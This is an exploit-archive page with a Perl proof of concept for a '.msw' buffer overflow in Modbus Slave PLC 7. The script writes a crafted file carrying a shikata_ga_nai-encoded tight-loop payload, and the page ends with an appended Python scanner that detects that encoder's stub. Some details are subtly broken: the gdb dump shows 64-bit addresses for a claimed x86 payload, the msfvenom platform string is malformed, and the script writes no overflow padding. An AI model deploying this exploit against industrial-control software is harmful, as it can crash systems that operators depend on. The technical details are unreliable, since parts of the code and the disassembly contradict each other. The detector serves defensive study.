Modbus Slave PLC 7 Buffer Overflow

Posted Oct 29, 2018
Authored by Kagan Capar

Modbus Slave PLC 7 .msw buffer overflow proof of concept exploit.

tags | exploit, overflow, proof of concept
SHA-256 | 57a316badac549c6e7e7a70dc048a41ecb4bd53fc9c8f1f0f65a53b66610d752

# Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
# Author: Kagan Capar
# Discovery Date: 2018-10-27
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Vendor Homepage: https://www.modbustools.com
# Tested Version: 7
# Tested on OS: Windows XP SP3 *ENG
# Other versions should be affected.
# About software: Modbus Slave simulates up to 32 slave devices in 32 windows.
# It speeds up PLC programming and is used for SCADA systems.
# Modbus is a serial communications protocol originally published by Schneider Electric.
# Steps to Reproduce: Run the Perl script below; it creates a file named
# "exploit.msw". Drag that file onto "mbslave.exe": the software enters a
# loop and crashes.
# Greetz : cwd-onkan-badko-key-akkus

#!/usr/bin/perl
use strict;
use warnings;

# Dump of assembler code for function loop:
# 0x0000555555558030 <+0>: mov $0x1e3b563c,%ebx
# 0x0000555555558035 <+5>: fld %st(4)
# 0x0000555555558037 <+7>: fnstenv -0xc(%rsp)
# 0x000055555555803b <+11>: pop %rax
# 0x000055555555803c <+12>: sub %ecx,%ecx
# 0x000055555555803e <+14>: mov $0x1,%cl
# 0x0000555555558040 <+16>: xor %ebx,0x14(%rax)
# 0x0000555555558043 <+19>: add $0x4,%eax
# 0x0000555555558046 <+22>: add 0x10(%rax),%ebx
# 0x0000555555558049 <+25>: fisubs 0xe0d0(%rbx)

# msfvenom -p generic/tight_loop --platform windows_86 -f perl -e x86/shikata_ga_nai
# print /x &loop
# $1 = 0x555555558030

# Write the encoded tight-loop payload out as the crafted .msw file.
open(my $code, '>', 'exploit.msw') or die "cannot open exploit.msw: $!";
binmode($code);
my $loop =
"\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9" .
"\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0" .
"\xe0";

print $code $loop;
close($code) or die "cannot close exploit.msw: $!";
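From a defender's standpoint, the most reusable thing in this PoC is the encoder fingerprint rather than the payload itself: the gdb dump above shows the fld / fnstenv -0xc(%rsp) / pop sequence that x86/shikata_ga_nai places in front of its payload to learn its own address (in 32-bit code the same bytes, d9 74 24 f4, decode as fnstenv [esp-0xc]). The Python scanner below is an added example, not part of the original PoC, that looks for that GetPC stub in a file or byte string and reports the offset, the register popped, and whether an x87 instruction precedes it. The embedded sample is the payload from the $loop string above; the function names and the six-byte look-back window are choices made for this example.

```python
"""Scan a file or byte string for the x87 'fnstenv' GetPC stub that the
x86/shikata_ga_nai encoder (used by the PoC above) emits in front of its
payload. Added detection example, not part of the original PoC."""
import re
import sys
from typing import List, Tuple

# Constructed sample input: the 29-byte encoded payload from the $loop string
# in the PoC above (copied from the page, not generated here).
SAMPLE_PAYLOAD = (
    b"\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9"
    b"\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0"
    b"\xe0"
)

# d9 74 24 f4 = fnstenv [esp-0xc], followed by a one-byte pop r32 (58..5f).
# fnstenv writes the 28-byte FPU environment at esp-12, so the 4-byte field
# holding the address of the last executed FPU instruction (env offset 12)
# lands exactly at [esp]; the pop then loads that address into a register.
# In the 64-bit gdb dump above the same bytes decode as fnstenv -0xc(%rsp).
FPU_GETPC = re.compile(rb"\xd9\x74\x24\xf4[\x58-\x5f]")

# Register encoded by the pop opcode: 0x58 + register number.
POP_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# How far back to look for the x87 instruction (opcode d8..df) that must
# execute before fnstenv for the saved instruction pointer to be useful.
# The window size is a heuristic choice of this example (assumption).
LOOKBACK = 6


def find_fpu_getpc(data: bytes) -> List[int]:
    """Return the offset of every fnstenv [esp-0xc]; pop r32 sequence."""
    return [m.start() for m in FPU_GETPC.finditer(data)]


def describe_hits(data: bytes) -> List[Tuple[int, str, bool]]:
    """For each hit: (offset, register popped, x87 opcode seen just before).

    A preceding x87 opcode raises confidence: compiled floating-point code
    can contain fnstenv, but fnstenv [esp-0xc] directly followed by a pop,
    right after another FPU instruction, is the GetPC idiom."""
    hits = []
    for off in find_fpu_getpc(data):
        reg = POP_REGS[data[off + 4] - 0x58]
        window = data[max(0, off - LOOKBACK):off]
        x87_before = any(0xD8 <= b <= 0xDF for b in window)
        hits.append((off, reg, x87_before))
    return hits


def scan_file(path: str) -> List[Tuple[int, str, bool]]:
    """Scan a file on disk (for example a suspicious .msw) for the stub."""
    with open(path, "rb") as fh:
        return describe_hits(fh.read())


if __name__ == "__main__":
    targets = sys.argv[1:]
    results = ([(p, scan_file(p)) for p in targets] if targets
               else [("<constructed sample>", describe_hits(SAMPLE_PAYLOAD))])
    for name, hits in results:
        if not hits:
            print(f"{name}: no FPU GetPC stub found")
        for off, reg, strong in hits:
            conf = "high" if strong else "low"
            print(f"{name}: fnstenv/pop {reg} GetPC stub at offset "
                  f"{off:#x} (confidence {conf})")
```

Run it with no arguments to scan the embedded sample (it reports the stub at offset 0x7 popping into eax with a preceding fld), or pass one or more file paths. Treat a hit as a reason to look closer rather than a verdict: fnstenv does occur in legitimate floating-point code, so the pop-immediately-after and preceding-x87-opcode checks are what keep the false-positive rate down.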

© 2022 Packet Storm. All rights reserved.